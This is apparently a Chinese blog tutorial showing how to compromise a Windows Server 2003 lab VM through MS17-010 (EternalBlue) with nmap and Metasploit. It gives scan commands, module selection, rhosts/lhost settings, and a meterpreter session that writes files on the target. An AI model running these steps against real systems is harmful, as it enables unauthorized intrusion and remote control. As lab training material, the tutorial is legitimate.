Kali linux利用(ms17-010)漏洞入侵Windows server 2003

NMAP MSF實現對目標系統滲透(Windows server 2003控制)

  1. Metasploit是一個免費的、可下載的框架,通過它可以很容易地獲取、開發並對計算機軟件漏洞實施攻擊。
  2. 此次採用kali Linux系統集成的metasploit進行測試驗證MS17-010(永恆之藍,著名比特幣勒索漏洞)。實驗環境均採用虛擬機。

前提準備:
Kali linux: 192.168.1.113
Windows server2003:192.168.1.102

1,方式一先使用nmap探測網絡中存活主機(設備)

在這裏插入圖片描述
方式二
root@wangzhike:~# netdiscover -i eth0 -r 192.168.1.0/24
在這裏插入圖片描述
目標系統:192.168.1.102 windows server 2003

2,探測網絡中的系統類型(nmap)
root@wangzhike:~# nmap -O 192.168.1.0/24
在這裏插入圖片描述
3.端口掃描
root@wangzhike:~# nmap -p 1-1000 192.168.1.102

root@wangzhike:~# nmap -p 1-1000 192.168.1.102
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-16 12:46 CST
Nmap scan report for 192.168.1.102
Host is up (0.000071s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 00:0C:29:82:C6:C2 (VMware)

端口介紹:
135端口:服務dcom、rpc的端口----客戶機連入系統服務
139端口:netbios文件打印共享服務—共享磁盤
445端口:文件夾共享、打印共享服務

4,利用server 2003自身漏洞(ms17-010)
前提:Windows server 2003 需要關閉防火牆。
入侵前必須初始、啓動數據庫。

root@wangzhike:~# msfdb init		//初始化數據庫
root@wangzhike:~# msfdb start		//啓動數據庫
root@wangzhike:~# netstat -ntlup | grep post 	//查看端口
root@wangzhike:~# msfdb status		//查看數據庫狀態

在這裏插入圖片描述
root@wangzhike:~# nmap --script=smb-vuln*.nse 192.168.1.102
在這裏插入圖片描述
我們·可以看到Windows server 2003存在ms17-010漏洞

root@wangzhike:~# msfconsole

在進入後
#####進入後不一定是這種樣式#####

msf > search ms17_010 //搜索查看漏洞

[!] Module database cache not built yet, using slow search
Matching Modules
================
   Name                                           Disclosure Date  Rank     Description
   ----                                           ---------------  ----     -----------
   auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   auxiliary/scanner/smb/smb_ms17_010                              normal   MS17-010 SMB RCE Detection
   exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
msf >

我們利用這個模塊:exploit/windows/smb/ms17_010_psexec
msf > use windows/smb/ms17_010_psexec //利用模塊
在這裏插入圖片描述

set rhosts 192.168.1.102	//設置攻擊目標的IP地址
set lhost 192.168.1.113		//攻擊機ip地址

進行攻擊run侵入:

在這裏插入圖片描述
侵入後可看到meterpreter>
我們就可以使用ifconfig命令
查看ip地址爲192.168.1.102
####地址爲192.168.1.102####
查看當前目錄pwd
在這裏插入圖片描述
在C:\WINDOWS目錄中創建wang.txt和hello.txt文件
在這裏插入圖片描述
在Windows server 2003中查看創建的兩個目錄
在這裏插入圖片描述
當然我們也可以進行其他控制!!!

至此,我們就可以使用kali linux 控制Windows server 2003啦!!!

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章